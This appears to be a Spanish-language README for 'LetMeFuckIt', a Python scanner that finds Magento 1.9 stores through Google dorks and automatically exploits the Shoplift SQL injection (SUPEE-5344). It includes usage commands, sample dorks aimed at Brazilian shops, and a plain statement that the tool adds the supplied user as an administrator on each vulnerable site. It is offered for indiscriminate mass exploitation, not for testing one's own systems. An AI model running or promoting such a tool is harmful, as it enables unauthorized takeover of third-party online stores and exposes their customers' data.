
Escáner y Exploit para Magento 1.9
Escáner y Exploit Magento
El Escáner explora la vulnerabilidad SQLi Vulnerability (1.9.1.0 CE) de Magento.
La vulnerabilidad fue corregida en el Patch SUPEE-5344, sin embargo, el escáner sirve para localizar y probar los sistemas que no aplicaron el parche de seguridad.
LetMeFuckIt fue escrito en Python y utiliza las siguientes bibliotecas:
pygoogle, argparse, urllib2, requests, base64
letmefuckit.py --dork <dork> --pages <number> --user <user> --pwd <pass>
letmefuckit.py --dork \"inurl:customer/account/login/ site:com.br\" --pages 4 --user adm --pwd pass
--dork --user --pwd --pages --help
"inurl:/customer/account/login site:com.br"
"inurl:/checkout/onepage/ site:com.br"
A través de la dork insertada, se realiza un escaneo en Google, las urls se guardan en el archivo urls.txt, que posteriormente se prueban automáticamente.
Los usuarios proporcionados en la ejecución se añaden automáticamente como administradores en los sitios vulnerables.
Caso você se depare com o erro abaixo, é porque o scanner utiliza a biblioteca pygoogle, a biblioteca está desatualizada com o novo sistema de API's do Google, pois agora é necessário uma Key para utilizar a api.
pygoogle ERROR __search__| responseDetails : Suspected Terms of Service Abuse. Please see http://code.google.com/apis/errors
Si aparece el error, solo espera 1 minuto o 2. El escáner volverá a la normalidad.
Exploit: Magento Shoplift exploit (SUPEE-5344) by Manish Kishan Tanwar AKA error1046 in 25/08/2015
LetMeFuckIt Scanner AutoPwned por OntheFrontLine in 27/09/2015